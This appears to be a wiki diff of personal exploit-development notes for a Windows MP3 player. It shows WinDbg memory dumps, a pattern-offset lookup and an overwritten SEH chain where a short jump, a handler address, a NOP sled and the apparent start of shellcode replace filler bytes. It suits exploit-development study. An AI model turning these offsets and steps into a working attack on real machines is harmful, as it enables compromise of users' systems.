Differences

This shows you the differences between two versions of the page.

--- exploiting:windows:milleniump3:start [2019/08/10 21:11] – created ebaer
+++ exploiting:windows:milleniump3:start [2019/08/10 21:16] (current) – ebaer
@@ Line 4: / Line 4: @@
 ===== Windbg/mona notes =====
-<code>
+<code bash>
 :000> r
 eax=00185748 ebx=00185748 ecx=00000000 edx=46376846 esi=0018471c edi=0623c00c
@@ Line 18: / Line 18: @@
 00185730: 68463068
 Invalid exception stack at 46396746
-:000> db esp L30
-00184708  30 38 40 00 48 57 18 00-00 00 00 00 c4 72 81 00  08@.HW.......r..
-00184718  0b f8 42 00 31 09 68 74-74 70 3a 2f 2f 41 61 30  ..B.1.http://Aa0
-00184728  41 61 31 41 61 32 41 61-33 41 61 34 41 61 35 41  Aa1Aa2Aa3Aa4Aa5A
 C:\_c\exploits>python pattern.py "Fg9F"
@@ Line 52: / Line 47: @@
 :00000060  00000000 00000000 00000000 00000000
 :00000070  00000000 00000000 00000000 00000000
+e7c
 :000> dp 00185e7c
-e7c  10014398 42424242 42424242 42424242
+e7c  1ceb9090 10014e98 90909090 90909090
-e8c  42424242 42424242 00000000 42424242
+e8c  90909090 90909090 00000000 90909090
-e9c  42424242 42424242 42424242 42424242
+e9c  90909090 ced99090 90fa2ebe 2474d9a0
-eac  42424242 42424242 42424242 42424242
-ebc  42424242 42424242 42424242 42424242
-ecc  42424242 42424242 42424242 42424242
-edc  42424242 42424242 42424242 42424242
+# some memo shortly after the seh chain is zeroed out -> jump over
 </code>